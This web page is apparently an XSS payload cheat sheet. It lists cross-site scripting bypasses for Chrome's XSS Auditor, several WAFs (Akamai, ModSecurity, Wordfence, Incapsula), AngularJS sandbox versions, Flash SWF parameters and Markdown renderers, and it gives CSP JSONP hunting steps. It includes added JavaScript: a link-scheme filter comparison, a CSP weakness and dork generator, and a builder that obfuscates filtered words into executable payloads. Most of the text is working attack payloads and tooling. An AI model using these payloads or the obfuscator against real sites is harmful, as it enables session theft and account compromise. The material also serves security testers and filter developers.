🦊The Art of XSS Exploitation
In the fast-paced realm of cybersecurity, where every click can hide a lurking danger, a new breed of tech-savvy guardians is rising. Armed with code and creativity, they venture into the territory of Cross-Site Scripting (XSS) vulnerabilities. This page collects XSS payloads grouped by the browser filter, WAF, renderer or framework each one defeats; join us on this journey through the art of XSS exploitation.
Chrome XSS-Auditor Bypasses: Crafting the Perfect Code
Chrome's XSS Auditor was a reflected-XSS filter that compared the request with the response; it was removed in Chrome 78, so these bypasses apply to older builds and to understanding how such filters fail. Meet the masterminds of code manipulation. @vivekchsm demonstrates a Chrome XSS-Auditor Bypass that keeps the javascript: URL out of the reflected markup by animating it into an SVG link's href:
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
But wait, there's more! Dive into the pre-v60 beta Chrome XSS-Auditor Bypass:
<script src="data:,alert(1)%250A-->
For those who crave variety, try these other Chrome XSS-Auditor Bypasses:
<script>alert(1)</script
<script>alert(1)%0d%0a-->%09</script
<x>%00%00%00%00%00%00%00<script>alert(1)</script>
Safari's XSS Vector: Where Art Meets Mischief
@mramydnei unveils a mesmerizing Safari XSS Vector:
<script>location.href;'javascript:alert%281%29'</script>
XSS Polyglot: The Multilingual Mischief Maker
Ahmed Elsobky presents the XSS Polyglot, a true linguistic masterpiece: a single string built to fire from HTML, attribute, JavaScript string and comment contexts alike:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Breaking Kona WAF (Akamai) Barriers: A Stroke of Genius
Witness the brilliance of Kona WAF (Akamai) Bypass:
\');confirm(1);//
Mastering ModSecurity WAF Bypass: A Strategic Endeavor
Bypassing ModSecurity is an art that depends on how strict the deployed rule set is (for the OWASP Core Rule Set, its paranoia level). A true artist knows the rules. The payload below repeats the event handler; browsers keep only the first occurrence of a duplicated attribute, so the extra copies cost nothing in the browser:
<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)>
Wordfence XSS Bypasses: A Symphony of Vulnerabilities
Unlock the hidden potential of Wordfence XSS Bypasses:
<meter onmouseover="alert(1)"
'">><div><meter onmouseover="alert(1)"</div>"
>><marquee loop=1 width=0 onfinish=alert(1)>
Incapsula WAF Bypasses: A Choreography of Code
@i_bo0om orchestrates Incapsula WAF Bypasses:
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
jQuery < 3.0.0 XSS: Unveiling Vulnerabilities
Egor Homakov reveals the jQuery XSS with this single line of code:
$.get('http://sakurity.com/jqueryxss')
jQuery before 3.0.0 executes a cross-domain response served with a JavaScript MIME type even when no dataType: 'script' was requested (CVE-2015-9251), so a $.get or $.ajax call to an origin the attacker controls, or a trusted API endpoint that can be made to return JavaScript, is code execution in the calling page. Pinning dataType (for example 'json') or upgrading jQuery removes the behaviour.
URL Verification Bypass
Take your exploits to new heights with URL verification bypasses. Browsers strip tabs and newlines from a URL before parsing it, so a scheme with a tab in the middle is still javascript: to the browser even though a string check for javascript: misses it; the //www.google.com/ part satisfies a host allowlist while being a line comment in JavaScript, and the %0A newline ends that comment so alert(1) runs:
javas	cript://www.google.com/%0Aalert(1)
Markdown XSS: A Subtle Intrusion
Markdown renderers that copy the link target into href without restricting the scheme let javascript: URLs through. The //host form hides the code behind what looks like a hostname, and the encoded newline (%0A or %0d%0a) terminates the JavaScript comment that // opened:
[a](javascript:confirm(1))
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a]: (javascript:prompt(1))
[a]:(javascript:alert(1)) //Add SOH Character
Flash SWF XSS: A World of Imagination
Flash Player reached end of life at the end of 2020 and current browsers no longer run it, but SWF files that pass a query parameter straight to JavaScript (ExternalInterface callbacks, getURL) still sit on many servers. Delve into the realm of Flash SWF XSS, where a single parameter reaches JavaScript:
ZeroClipboard: ZeroClipboard.swf?id=\"))}catch(e){confirm(/XSS./.source);}//&width=500&height=500&.swf
plUpload Player: plupload.flash.swf?%#target%g=alert&uid%g=XSS&
plUpload MoxiePlayer: Moxie.swf?target%g=confirm&uid%g=XSS (also works with Moxie.cdn.swf and other variants)
FlashMediaElement: flashmediaelement.swf?jsinitfunctio%gn=alert1
videoJS: video-js.swf?readyFunction=confirm and video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29
YUI "io.swf": io.swf?yid=\"));}catch(e){alert(document.domain);}//
YUI "uploader.swf": uploader.swf?allowedDomain=\%22}%29%29%29}catch%28e%29{alert%28document.domain%29;}//<
Open Flash Chart: open-flash-chart.swf?get-data=(function(){alert(1)})()
AutoDemo: control.swf?onend=javascript:alert(1)//
Adobe FLV Progressive: /main.swf?baseurl=asfunction:getURL,javascript:alert(1)// and /FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//
Banner.swf (generic): banner.swf?clickTAG=javascript:alert(document.domain);//
JWPlayer (legacy): player.swf?playerready=alert(document.domain) and /player.swf?tracecall=alert(document.domain)
SWFUpload 2.2.0.1: `swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!confirm(1);//`
Uploadify (legacy): uploadify.swf?movieName=%22])}catch(e){if(!window.x){window.x=1;confirm(%27XSS%27)}}//&.swf
FlowPlayer 3.2.7: flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf
Note: For a comprehensive guide on constructing Flash-based XSS payloads, refer to MWR Labs.
Lightweight Markup Languages: A World of Hidden Vulnerabilities
Discover vulnerabilities lurking in lightweight markup languages:
RubyDoc (.rdoc)
XSS[JavaScript:alert(1)]
Textile (.textile)
"Test link":javascript:alert(1)
reStructuredText (.rst)
`Test link`__.
__ javascript:alert(document.domain)
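The URL-verification, Markdown and lightweight-markup payloads above all rely on the same fact: the renderer copies the link target into href, and the browser's URL parser, not the filter, decides what scheme that is. The parser strips ASCII tab and newline anywhere in the input and leading C0 controls (such as the SOH character) before reading the scheme, and lower-cases it. Node's WHATWG URL implementation does the same, so the added example below (not code from the original page) uses it to stand in for the browser and contrasts a raw-string check with a parse-then-decide check. BASE is a hypothetical origin used only to resolve relative links; the sample links are constructed from the payloads on this page.

```javascript
// Added example: string-prefix filter versus parsed-scheme filter for link hrefs.
// BASE is a hypothetical origin used to resolve relative links.
const BASE = 'https://example.test/';
const ALLOWED_SCHEMES = new Set(['http:', 'https:', 'mailto:']);

// The kind of filter these payloads are written against: a prefix check on
// the raw string, which never sees what the browser will actually parse.
function naiveAllows(href) {
  const lower = href.toLowerCase();
  return !lower.startsWith('javascript:') && !lower.startsWith('data:');
}

// Parse first (tabs, newlines and leading controls are removed by the parser,
// exactly as in the browser), then decide on the parsed scheme. Returns the
// normalised URL, or null when the link must be dropped.
function safeHref(href) {
  let url;
  try {
    url = new URL(href, BASE);
  } catch {
    return null; // unparsable: drop rather than guess
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Constructed inputs: the page's URL-verification and Markdown payloads plus
// two benign links.
const SAMPLE_LINKS = [
  'javas\tcript://www.google.com/%0Aalert(1)', // tab inside the scheme
  'javascript://www.google.com%0Aprompt(1)',   // code hidden behind a "host"
  'javascript://%0d%0aconfirm(1)',
  '\u0001javascript:alert(1)',                  // leading SOH character
  ' JaVaScRiPt:alert(1)',                       // leading space, mixed case
  'https://example.test/docs',
  '/relative/path',
];

// Side-by-side verdicts for each link: what the naive filter would let
// through and what the parsed-scheme filter returns.
function audit(links = SAMPLE_LINKS) {
  return links.map((href) => ({
    href,
    naiveAllows: naiveAllows(href),
    parsed: safeHref(href),
  }));
}
```

Run audit() and every javascript: variant comes back with naiveAllows true and parsed null, while the two benign links are returned normalised; the lesson is to allowlist the parsed url.protocol and never to pattern-match the raw string.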
Unleashing Unicode Characters: A Silent Intrusion
Padding the payload with multi-byte Unicode characters can trip filters that decode, count or normalise input differently from the browser:
†‡•<img src=a onerror=javascript:alert('test')>…‰€
AngularJS Template Injection: The Art of Manipulation
AngularJS evaluates {{ }} expressions in client-side templates, so landing user input inside one is code execution; probe with {{7*7}} and look for 49 in the rendered page. From 1.2.0 to 1.5.x evaluation ran inside an expression sandbox that was escaped again and again (the sandbox was removed in 1.6, after which any expression runs unrestricted). Each escape below is tied to the versions it works on:
1.0.1 - 1.1.5 by Mario Heiderich (Cure53)
{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1 by Jann Horn (Google)
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 by Gareth Heyes (PortSwigger)
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18 by Jann Horn (Google)
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 by Mathias Karlsson
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.0 by Gábor Molnár (Google)
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2 by Gareth Heyes (PortSwigger)
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18 by Gareth Heyes (PortSwigger)
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19 by Gareth Heyes (PortSwigger)
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20 by Gareth Heyes (PortSwigger)
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
Content Security Policy (CSP) Bypass: A Dance with Danger
A CSP that allowlists a host is only as strong as the scripts that host will serve: a JSONP endpoint on an allowed origin returns attacker-chosen text in the callback position, so a script tag pointing at that endpoint with callback=alert(1) is a legitimate script from a legitimate source. First, grab the target's CSP (header names are case-insensitive, and a policy may also live in a <meta http-equiv> tag that a HEAD request will not show):
curl -sI http://example.com | grep -i 'content-security-policy'
Then, explore JSONP endpoints on allowlisted domains with a Google dork:
site:example.com inurl:callback
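The procedure above has two mechanical steps, reading the policy and listing the hosts worth hunting JSONP on, and a few policy weaknesses that make the hunt unnecessary. The added example below (not code from the original page) parses a raw Content-Security-Policy value, applies the spec's fallback from script-src to default-src, flags 'unsafe-inline' without a nonce or hash, 'unsafe-eval', scheme and wildcard sources and 'strict-dynamic' (which makes CSP3 browsers ignore the host allowlist), and emits the page's dork for every explicit host. The SAMPLE_CSP value and its hostnames are constructed for illustration.

```javascript
// Added example: turn a CSP header into a JSONP hunting list plus the
// weaknesses that already allow script execution. SAMPLE_CSP is constructed.
const SAMPLE_CSP =
  "default-src 'self'; script-src 'self' https://apis.example-cdn.test *.widgets.test 'unsafe-inline'; " +
  'img-src *; report-uri /csp-report';

// Split "name value value; name value" into a Map of directive -> source list.
function parseCsp(header) {
  const policy = new Map();
  for (const directive of header.split(';')) {
    const [name, ...values] = directive.trim().split(/\s+/);
    if (name) policy.set(name.toLowerCase(), values);
  }
  return policy;
}

// script-src falls back to default-src when absent; null means no restriction.
function effectiveScriptSrc(policy) {
  return policy.get('script-src') ?? policy.get('default-src') ?? null;
}

// 'self', 'nonce-...', 'unsafe-inline' and bare schemes such as https: are
// keywords, not hosts.
function isKeyword(src) {
  return src.startsWith("'") || /^[a-z][a-z0-9+.-]*:$/i.test(src);
}

function analyse(header) {
  const policy = parseCsp(header);
  const src = effectiveScriptSrc(policy);
  const weaknesses = [];
  const hosts = [];
  if (src === null) {
    weaknesses.push('no script-src or default-src: scripts from anywhere run');
    return { weaknesses, hosts, dorks: [] };
  }
  const hasNonceOrHash = src.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  if (src.includes("'unsafe-inline'") && !hasNonceOrHash) {
    weaknesses.push("'unsafe-inline' without nonce/hash: inline <script> and event handlers run");
  }
  if (src.includes("'unsafe-eval'")) {
    weaknesses.push("'unsafe-eval': eval/Function reachable from any allowed script");
  }
  if (src.includes("'strict-dynamic'")) {
    weaknesses.push("'strict-dynamic': CSP3 browsers ignore the host allowlist, so JSONP hosts matter only for older ones");
  }
  for (const s of src) {
    if (s === '*' || s === 'https:' || s === 'http:' || s === 'data:') {
      weaknesses.push(`scheme or wildcard source ${s}: any origin of that kind serves script`);
      continue;
    }
    if (isKeyword(s)) continue;
    hosts.push(s.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '')); // drop scheme, keep *. prefix
  }
  if (!policy.has('object-src') && !policy.has('default-src')) {
    weaknesses.push('object-src unset with no default-src: plugin-based injection not blocked');
  }
  // The page's dork, one per allowlisted host; a wildcard prefix is dropped
  // because site: already covers subdomains.
  const dorks = hosts.map((h) => `site:${h.replace(/^\*\./, '')} inurl:callback`);
  return { weaknesses, hosts, dorks };
}
```

'self' is deliberately not listed as a host: JSONP endpoints on the application's own origin count just as much, but they are found by crawling the target rather than by a dork.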
Dealing with Encoded or Deleted Attributes
In some cases you cannot break out of the attribute you land in, because the closing quote is encoded or stripped by the application's security mechanisms. When that attribute is an href, the value alone is enough, since a javascript: URL executes on click; here are some payload examples to consider:
<!-- 1) Basic JavaScript alert -->
<a href="javascript:alert(1)">Click</a>
<!-- 2) Same payload with a null character inserted into the scheme (the null byte itself is not reproduced here) -->
<a href="javascript:alert(1)">Click</a>
<!-- 3) Utilizing curly braces -->
<a href="javascript:{ alert`0` }">Click</a>
<!-- 4) Using an event handler -->
<a src="google.com" onclick="alert(1)">Click</a>
Escaping from Encoded or Deleted Tags
If you find yourself in a situation where you can escape from the attribute but not from the tag itself (typically when the < or > characters are encoded or deleted), you can try these payload examples:
<!-- 1) Input field with an onclick event -->
<input value"XXXXXXX" onclick=alert(1)>Click</input>
<!-- 2) Input field with various attributes -->
<input type:"text" value="XSS" accesskey="x" onclick="alert(1)" >
<!-- 3) Image tag with encoded characters -->
<img src=x onerror="javascript:alert('XSS')">
<!-- 4) Link tag with encoded JavaScript -->
<div><a src="google.com" href="javaSCRIPT:alert(/xss/)">XSS</a>
<!-- 5) Link tag with JavaScript in an onclick event -->
<a href=https://google.com onclick=alert(document.location.hash.substring(1))#{saasasasas}>Click</a>
Dealing with Encoded Alerts
When the alert function itself is encoded or deleted, you can use more complex payload examples to trigger alerts:
<!-- 1) Complex JavaScript payload to bypass encoding -->
<script>$='',_=!$+$,$$=!_+$,$_=$+{},_$=_[$++],__=_[_$$=$],_$_=++_$$+$,$$$=$_[_$$+_$_],_[$$$+=$_[$]+(_.$$+$_)[$]+$$[_$_]+_$+__+_[_$$]+$$$+_$+$_[$]+__][$$$]($$[$]+$$[_$$]+_[_$_]+__+_$+"($)")()</script>
<!-- 2) Another complex JavaScript payload -->
<script>[[,$,_,$$,__,$_,_$,$$$,$__,,___]=[![]+[]+!![]][+[]]+[][[]]],$$_=[][$+$_],[,,,$_$,,,_$$,,,,,__$,_$_]=[...$$_+[]],$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$$$_[$_$+_$$+___+$$+$_+_$+$$$+$_$+$_+_$$+_$]($+_+__+_$+$_+__$+[+!!$]+_$_)()</script>
<!-- 3) Yet another complex JavaScript payload -->
<script>([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+`(1)`)()</script>
<!-- 4) Simple prompt alert -->
<script>prompt(1)</script>
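The three obfuscated payloads above share one trick: every letter of "alert" is read out of a string the engine produces for free ("[object Object]", "true", "false", "undefined"), the Function constructor is reached as []["constructor"]["constructor"] spelt the same way, and only the parentheses and digit are written literally inside a template string. The added example below (not code from the original page) generalises that into a small builder, so any filtered word can be spelt and called; it is written to be checked in Node, where the self-check helper evaluates the generated expression.

```javascript
// Added example: spell a filtered identifier from engine-produced strings and
// call it through the Function constructor, as the page's payloads do.
// Each pool entry is [expression, the string it evaluates to].
const POOL = [
  ['[]+{}', '[object Object]'],
  ['!![]+[]', 'true'],
  ['![]+[]', 'false'],
  ['[][[]]+[]', 'undefined'],
  ['+[![]]+[]', 'NaN'],
  ['1/0+[]', 'Infinity'],
];

// Build an expression that evaluates to `target` without typing its letters.
// Characters outside the pool (digits, parentheses) are emitted as a plain
// quoted literal; the page's payloads hide them in a template string instead.
function spell(target) {
  const parts = [];
  for (const ch of target) {
    const hit = POOL.find(([, s]) => s.includes(ch));
    parts.push(hit ? `(${hit[0]})[${hit[1].indexOf(ch)}]` : JSON.stringify(ch));
  }
  return parts.join('+');
}

// []["constructor"] is Array and Array["constructor"] is Function, so this
// reaches the Function constructor without writing either name.
function functionCtorExpr() {
  const c = spell('constructor');
  return `[][${c}][${c}]`;
}

// Full payload: Function("<code>")() with <code> spelt from the pool.
function payload(code) {
  return `${functionCtorExpr()}(${spell(code)})()`;
}

// Self-check helper for the reader: evaluate a generated expression.
function evaluate(expr) {
  return Function(`return (${expr})`)();
}
```

payload('alert(1)') contains neither "alert" nor "constructor" as text, yet evaluating it calls the global alert with 1; to confirm without a browser, define globalThis.alert as a recording stub before running evaluate(payload('alert(1)')).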
Handling Encoded Spaces
If spaces are encoded or deleted, you can use tab URL encoding (%09) to insert spaces where needed:
<input%09value"XXXXXXX"%09onclick=alert(1)>Click</input>
Handling Encoded Parentheses
To handle encoded or deleted parentheses, call the function with a tagged template literal: backticks invoke it with the template's strings array, so alert`1` still displays 1:
<!-- Encoded parentheses in alert function -->
<script>alert`1`</script>
Trying Different Tags
If the <script> tag is encoded or deleted by security mechanisms, consider using other HTML tags like <svg>, <img>, or <iframe> to execute your JavaScript code.
WAF Bypass Techniques
Web Application Firewalls (WAFs) may block certain payloads. Here are some WAF bypass techniques shared by security researchers. Always use them responsibly and with proper authorization:
Bypass AWS WAF by adding "<!" before your payload.
Bypass Akamai Ghost WAF by using URL encoding.
Bypass DotDefender WAF using a crafted <div> element.
Bypass CloudFlare using various payload formats.
Useful Resources
XSS PolyglotsPolice
XSS PolyglotsPolice is a tool that allows you to test multiple XSS scenarios with a single payload. It can help you work more efficiently and effectively when testing for cross-site scripting vulnerabilities. Always follow responsible disclosure practices when reporting security issues to website owners or administrators.
Embrace the world of XSS exploitation, where creativity and code converge to challenge the boundaries of digital security. Remember, with great power comes great responsibility. Stay ethical, stay safe, and continue to push the boundaries of cybersecurity.